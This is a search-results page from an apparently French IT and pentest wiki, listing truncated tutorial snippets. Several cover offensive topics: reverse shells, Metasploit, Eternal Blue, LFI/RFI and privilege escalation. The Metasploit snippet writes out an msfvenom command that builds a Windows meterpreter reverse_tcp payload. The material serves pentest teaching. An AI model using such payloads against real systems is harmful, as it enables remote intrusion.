Advanced Search
Search Results
314 total results found
[Debian] Serveur NTP
Introduction Il peut être utile d'installer un serveur de temps sur un réseau lorsque vous faites des opérations qui nécessitent que les horloges de vos différents systèmes soient synchronisées. Installation serveur Commencez par installer le paquet ntp sur...
[OS] Kali Linux
Introduction La distribution Kali Linux est basé sur Debian et il est dédié aux tâches de pentest. Il s'agit certainement du système le plus réputé dans le domaine de la sécurité informatique. Ce tutoriel va traiter une installation dans une machine virtuel...
[Proxmox] Spice
Introduction Le protocole SPICE est utilisé pour accéder graphiquement à la console de vos machines virtuelles sur Proxmox. Il est plus agréable d'utilisation que le serveur VNC utilisé par défaut à travers le navigateur puisqu'il permet une meilleure intégr...
[Bash] Explainshell
Introduction Cet outil en ligne vous permet de décomposer une commande afin de comprendre le fonctionnement et l'intérêt des paramètres. Site ExplainShell
[SOC] Afficher l'empreinte d'un fichier
Introduction Dans le cadre du travail d'analyste, il peut être intéressant d'obtenir l'empreinte d'un fichier sous ses différentes formes (MD5, SHA-1 ou SHA-256). Ce tutoriel traitera la méthodologie à suivre sous Linux exclusivement. Manuel MD5 md5sum ...
[Proxmox] Gestion de VMs en CLI
Introduction Lors d'un dépannage d'appoint, il peut s'avérer utile de manipuler vos machines virtuelles et vos conteneurs depuis le shell via la commande qm. Cheat-sheet Lister vos VMs qm list Démarrer une VM qm start <VMID> Éteindre une VM qm shutdown...
[Python] Socket
Introduction En python, pour créer des applications en réseau il faut passer par des sockets qui est un objet de communication réseau qui permet d'échanger de l'information sur la couche IP. Codage Quelques explications Le socket est composé : D'un pr...
[Exploitation/Réseau] Netcat
Introduction Netcat est un outil en ligne de commande qui permet de travailler sur des connexions réseaux TCP et UDP. Il peut être utile pour diagnostiquer ou se connecter à des applications rustiques utilisant des sockets traditionnels. Manuel Connexion...
[Exploitation/Réseau] Pwncat
Introduction Cet outil vise à fournir la même fonction que netcat avec des fonctions supplémentaires très pratiques lors de vos tests d'intrusion. Installation Voici la commande pour installer pwncat dans un environnement virtuel : python3 -m venv /opt/p...
[Exploitation/Réseau] Metasploit
Introduction Metasploit est un framework complet pour les pentester. Il est très célèbre et réputé pour sa facilité d'utilisation. Reverse shell Meterpreter Payload Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> --format=exe ...
[Exploitation/Réseau] Reverse shell
Introduction Le reverse shell est un type de payload qui permet à l'attaquant d'établir une connexion dans le sens inverse d'un bind shell et qui vous permet d'exécuter des commandes à distance. Revshell.com Ce site permet de générer des reverse shells ...
[Powershell] Cheat-sheet
Introduction Vous pouvez effectuer des opérations pratiques avec Powershell. Certaines commandes seront données dans cette page. Cheat-sheet Télécharger un fichier Invoke-WebRequest -Uri "<LINK>" -OutFile "<OUTPUT>" Obtenir le hash d'un fichier Get-File...
[Privesc/Windows] Winpeas
Introduction Winpeas est l'équivalent de Linpeas pour Windows. Il permet de faire de l'énumération afin de trouver comment vous allez pouvoir procéder pour l'escalade de privilège. Manuel Pour lancer Winpeas sur la machine cible vous allez devoir le téléc...
[Exploitation/Windows] Eternal Blue
Introduction L'exploit Eternal Blue a été développé par la NSA en 2017. Il fait suite à l'exploitation de la vulnérabilité MS17-010 lors de la campagne de Ransomware Wannacry. La faille est présente dans la v1 du protcole SMB et permet notamment une RCE. ...
[Exploitation/Web] LFI / RFI
Introduction Les vulnérabilités web LFI pour Local File Inclusion et RFI pour Remote File Inclusion sont utilisées pour accéder à des ressources non autorisées sur le serveur cible. Elles exploitent généralement un paramètre mal protégé qui utilise souvent u...
[Énumération/Linux] Git-dumper
Introduction Parfois, le site web que vous attaquez peut contenir un dépôt Git. Dans ce cas, il peut être intéressant le récupérer pour accéder au code source voire aux fichiers de configurations qui pourraient contenir des mots de passe ou autre. Git-dumpe...
[Exploitation/Web] CSRF
Introduction La faille CSRF pour Cross- Site Request Forgery fonctionne presque sur le même principe que XSS mais a pour objectif de faire exécuter à un utilisateur privilégié, une fonction non accessible en temps normal. Source Documentation - PortSwigge...
[Exploitation/Web] JWT
Introduction Les JWT pour JSON web tokens sont des jetons utilisés un peu de la même manière que les cookies qui permettent de gérer l'authentification à une page. Ils sont segmentés en 3 parties séparées par des points : Le header. Le payload (contenu). ...
[C] Threads
Introduction Le langage C supporte l'utilisation des threads qui sont des tâches sous-jacentes d'un processus permettant d'effectuer plusieurs tâches en parallèle. Manuel pthread_create La fonction pthread_create va permettre d'exécuter une fonction dans u...
[C] Fichiers
Introduction Le langage C permet de sauvegarder ou de lire du texte et du contenu binaire dans des fichiers. Exemple #include <stdio.h> #include <stdlib.h> #include <string.h> // Function to save text into a file void saveText(const char *fileName, co...